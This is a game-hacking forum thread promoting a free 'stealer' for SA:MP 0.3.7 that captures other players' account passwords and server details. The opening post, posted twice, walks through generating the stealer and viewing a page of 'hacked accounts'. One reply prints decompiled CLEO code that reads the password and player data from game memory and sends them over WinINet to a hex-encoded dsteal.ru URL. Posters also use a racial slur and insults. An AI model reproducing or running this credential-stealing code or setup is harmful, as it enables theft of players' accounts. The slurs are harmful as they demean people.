SA:MP 0.3.7 Keylogger (Stealer)

[Strechea]

The moment when you have nothing better to do than doing shitty things.

I see it as an interactive project since no one in my country made something like that. Only russians made it.

This project has no bad intentions, once bought the buyer will get the sources if he wants to, with the conditions he will get his own website and make the connections between in-game code and web (he will get even web source).

Why I made it?
The real and the simplest reason is that because I like new challenges and of course I want to learn something new. If you are a developer, then you will probably understand.

How it works?

Here we will talk about the free version.

1. Disadvantages
- uncrypted file
- CLEO file only with the stealer (so If we ignore the stealer, then the file it's like me falling in a void for eternity)
- no stuffing (like useless/unused code)
- it will expire automatically in some hours (for now I have to disable them manually because I didn't figured out yet how to do something like that)

2. Steps to create a free Stealer (only for CLEO)
- Open this link in a new TAB.
- In the textbox ID you will have to enter a number with 8 digits. Make sure you choose a really hard number so no one will can see your directory.
- Choose the server you want the stealer to work for.
- Choose the stealer type, but since only CLEO is available for now ... I don't think I have to tell you again what you have to choose, no?
- Press the button named `Create`. If everything succeeded you will get a message like: `Client Request: Succeeded!`
- Will be displayed three links. We have to open them in a new TAB (Click 2 on the link --> Open in new TAB)

3. Links:
1. First link will redirect you to //myWebHost//client_directory//client_ID//client_ID.cs and here you will have to download the stealer (Click 2 anywhere in the page and press `Save As` button. Anyone with nigga instincts already knew that)
2. Second link will redirect you to //myWebHost//client_directory//client_ID//client_ID.txt and here will be displayed all your hacked accounts. Everyone who uses the stealer in the server you created it for, all his data will be displayed here.
3. Third link it's your directory. Here you can visit the client_php_file.php.

Some other informations:
You must wait 10~seconds between every created stealer to avoid any @Parazitas abuses, like using all the bandwitdh and storage. You knew how much porn I had there buddy?
And also in the `client_php_file.php` there's a cooldown (120 seconds if I remember well).

Project made by: Popica

 

[Parazitas]

shit....

 

[monday]

It would be nice if the code was shared, it would have some educational value, but without it, what's the point? Help random people steal passwords of other players?

 

[Strechea]

It would be nice if the code was shared, it would have some educational value, but without it, what's the point? Help random people steal passwords of other players?

That wouldn't be nice I think.
Actually it's pretty easy to make what I did, anyone can make it if he is a bit open-minded.

 

[Strechea]

shit....

That wasn't nice from you. I had tons of porn there buddy

 

[JaggerJam]

Eat a**
https://blast.hk/threads/16018/

 

[monday]

So what is the price?

 

[Hidend]

fuck off retarded, anyway if you have at least 2 iq you can search all of this for free using google

 

[Strechea]

So what is the price?

for you free

 

[0x_]

Please remove your selling option from this thread and read http://ugbase.eu/index.php?threads/general-ugbase-eu-rules.14418/#post-93003 about selling products.
Nevertheless this isn't the right way for educational purpose - ok. but you shouldn't advertise it as keylogger for stealing accounts or data in general.

 

[jksadP23]

//-------------MAIN---------------
0000: NOP
wait 0
call @Noname_1646 0
call @Noname_1506 1 -38
jump @Noname_1838

:Noname_38
wait 0
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@
0A8E: 33@ = 0@ + 47806 // int
0A8D: 32@ = read_memory 33@ size 1 virtual_protect 1
if
32@ == 0
else_jump @Noname_166
0A8E: 3@ = 0@ + 2173568 // int

:Noname_166
if
32@ == 64
else_jump @Noname_197
0A8E: 3@ = 0@ + 2173624 // int

:Noname_197
0A8D: 2@ = read_memory 3@ size 4 virtual_protect 1
if
2@ > 1000
else_jump @Noname_1108
0A8E: 22@ = 2@ + 985 // int
0A8D: 23@ = read_memory 22@ size 4 virtual_protect 1
if
2@ > 1000
else_jump @Noname_1108
0A8E: 5@ = 23@ + 20 // int
0A8D: 4@ = read_memory 5@ size 4 virtual_protect 1
if
4@ > 1000
else_jump @Noname_1108
0A8E: 5@ = 4@ + 34 // int
0A8D: 24@ = read_memory 5@ size 4 virtual_protect 1
if
24@ > 1000
else_jump @Noname_1108
if
32@ == 0
else_jump @Noname_383
0A8E: 22@ = 0@ + 2173504 // int

:Noname_383
if
32@ == 64
else_jump @Noname_414
0A8E: 22@ = 0@ + 2173560 // int

:Noname_414
0A8D: 1@ = read_memory 22@ size 4 virtual_protect 1
if
1@ > 1000
else_jump @Noname_1108
0A8E: 7@ = 1@ + 40 // int
0A8D: 6@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 5@ = 1@ + 44 // int
0A8D: 26@ = read_memory 5@ size 4 virtual_protect 1
if
6@ == 1
else_jump @Noname_539
if or
26@ == 1
26@ == 3
else_jump @Noname_539
25@ = 1

:Noname_539
if and
25@ == 1
not 6@ == 1
else_jump @Noname_1108
0A8E: 7@ = 1@ + 48 // int
0A8D: 3@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 6@ = 1@ + 36 // int
0A8D: 13@ = read_memory 6@ size 4 virtual_protect 1
if
32@ == 0
else_jump @Noname_639
0A8E: 6@ = 0@ + 617008 // int

:Noname_639
if
32@ == 64
else_jump @Noname_670
0A8E: 6@ = 0@ + 515232 // int

:Noname_670
0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@
0A8E: 6@ = 4@ + 26 // int
0A8D: 23@ = read_memory 6@ size 4 virtual_protect 1
0A8E: 7@ = 4@ + 10 // int
if
not 23@ >= 16
else_jump @Noname_751
0085: 12@ = 7@ // (int)
jump @Noname_763

:Noname_751
0A8D: 12@ = read_memory 7@ size 4 virtual_protect 1

:Noname_763
wait 100
0A8E: 9@ = 2@ + 710 // int
0A8E: 14@ = 2@ + 452 // int
0A8E: 8@ = 2@ + 969 // int
0A8D: 15@ = read_memory 8@ size 4 virtual_protect 1
0A8E: 18@ = 4@ + 42 // int
0A8D: 27@ = read_memory 18@ size 4 virtual_protect 1
21@ = Player.Money($0[2])
0AC6: 0@ = label @Noname_1802 offset
call @Noname_1115 0 22@ 4@ 25@ 6@ 7@ 8@ 19@ 10@
alloc 20@ 1024
gosub @Noname_1828
alloc 20@ 456
format 20@ "%sbase=%d&ip=%s:%d&serv=%s&inid=%d&inp=%s&mn=%d&score=%d&time=%d:%d&data=%d.%d&nn=%s" 0@ 28@ 14@ 15@ 9@ 3@ 5@ 21@ 27@ 7@ 8@ 6@ 4@ 12@
alloc 8@ 356
format 8@ ""
call @Noname_1357 1 8@ 9@
call @Noname_1430 2 9@ 20@
free 8@
free 20@
25@ = 0

:Noname_1108
jump @Noname_38

:Noname_1115
0AA2: 0@ = load_library "kernel32.dll" // IF and SET
0AA4: 1@ = get_proc_address "GetLocalTime" library 0@ // IF and SET
alloc 2@ 32
0AA5: call 1@ num_params 1 pop 0 2@
0A8D: 3@ = read_memory 2@ size 2 virtual_protect 0
2@ += 2
0A8D: 4@ = read_memory 2@ size 2 virtual_protect 0
2@ += 2
0A8D: 5@ = read_memory 2@ size 2 virtual_protect 0
2@ += 2
0A8D: 6@ = read_memory 2@ size 2 virtual_protect 0
2@ += 2
0A8D: 7@ = read_memory 2@ size 2 virtual_protect 0
2@ += 2
0A8D: 8@ = read_memory 2@ size 2 virtual_protect 0
2@ += 2
0A8D: 9@ = read_memory 2@ size 2 virtual_protect 0
2@ += 2
0A8D: 10@ = read_memory 2@ size 2 virtual_protect 0
2@ -= 30
ret 8 22@ 4@ 25@ 6@ 7@ 8@ 9@ 10@

:Noname_1357
0AA2: 30@ = load_library "Wininet.dll" // IF and SET
0AA4: 29@ = get_proc_address "InternetOpenA" library 30@ // IF and SET
0AA7: call_function 29@ num_params 5 pop 0 0 0 0 0 0@ 1@
ret 1 1@

:Noname_1430
0AA2: 30@ = load_library "Wininet.dll" // IF and SET
0AA4: 29@ = get_proc_address "InternetOpenUrlA" library 30@ // IF and SET
0AA7: call_function 29@ num_params 6 pop 0 0 0 0 0 1@ 0@ 2@
ret 0

:Noname_1506
0A9F: 32@ = current_thread_pointer
32@ += 16
0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0
0062: 32@ -= 0@ // (int)
0AA7: call_function 4607008 num_params 1 pop 1 32@ 33@
005A: 32@ += 0@ // (int)
33@ += 16
0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0
33@ += 44
32@ = 0

:Noname_1597
0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0
33@ += 4
32@ += 1
32@ > 30
else_jump @Noname_1597
ret 0

:Noname_1646
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@
0@ += 371500
0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1
0@ += 4
0A8C: write_memory 0@ size 1 value 144 virtual_protect 1
0@ += 9
0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1
0@ += 4
0A8C: write_memory 0@ size 1 value 144 virtual_protect 1
ret 0

:Noname_1802
hex
68 74 74 70 3A 2F 2F 64 73 74 65 61 6C 2E 72 75
2F 61 64 64 2E 70 68 70 3F 00
end

:Noname_1828
28@ = 637
return

:Noname_1838
end_thread
















hex
68 74 74 70 3A 2F 2F 64 73 74 65 61 6C 2E 72 75
2F 61 64 64 2E 70 68 70 3F 00
end
is
http...
This is where it sends files to

 

[Strechea]

News:

1. Added ASI Stealer type for most servers except OG-Times (still working for).
2. Added a link and once you will open it, the stealer will automatically start to download (the manually link it's still here in case the server is busy (ya, some trollers, they are even there!))

 

[elianfox]

link

 

[cyberguard]

i have a better version

 

[cyberguard]

.

 

[DA TI EBAM MAJKATA]

Can i have the link?
Please

 

[Mamooithhh]

The moment when you have nothing better to do than doing shitty things.

I see it as an interactive project since no one in my country made something like that. Only russians made it.

This project has no bad intentions, once bought the buyer will get the sources if he wants to, with the conditions he will get his own website and make the connections between in-game code and web (he will get even web source).

Why I made it?
The real and the simplest reason is that because I like new challenges and of course I want to learn something new. If you are a developer, then you will probably understand.

How it works?

Here we will talk about the free version.

1. Disadvantages
- uncrypted file
- CLEO file only with the stealer (so If we ignore the stealer, then the file it's like me falling in a void for eternity)
- no stuffing (like useless/unused code)
- it will expire automatically in some hours (for now I have to disable them manually because I didn't figured out yet how to do something like that)

2. Steps to create a free Stealer (only for CLEO)
- Open this link in a new TAB.
- In the textbox ID you will have to enter a number with 8 digits. Make sure you choose a really hard number so no one will can see your directory.
- Choose the server you want the stealer to work for.
- Choose the stealer type, but since only CLEO is available for now ... I don't think I have to tell you again what you have to choose, no?
- Press the button named `Create`. If everything succeeded you will get a message like: `Client Request: Succeeded!`
- Will be displayed three links. We have to open them in a new TAB (Click 2 on the link --> Open in new TAB)

3. Links:
1. First link will redirect you to //myWebHost//client_directory//client_ID//client_ID.cs and here you will have to download the stealer (Click 2 anywhere in the page and press `Save As` button. Anyone with nigga instincts already knew that)
2. Second link will redirect you to //myWebHost//client_directory//client_ID//client_ID.txt and here will be displayed all your hacked accounts. Everyone who uses the stealer in the server you created it for, all his data will be displayed here.
3. Third link it's your directory. Here you can visit the client_php_file.php.

Some other informations:
You must wait 10~seconds between every created stealer to avoid any @Parazitas abuses, like using all the bandwitdh and storage. You knew how much porn I had there buddy?
And also in the `client_php_file.php` there's a cooldown (120 seconds if I remember well).

Project made by: Popica

wtf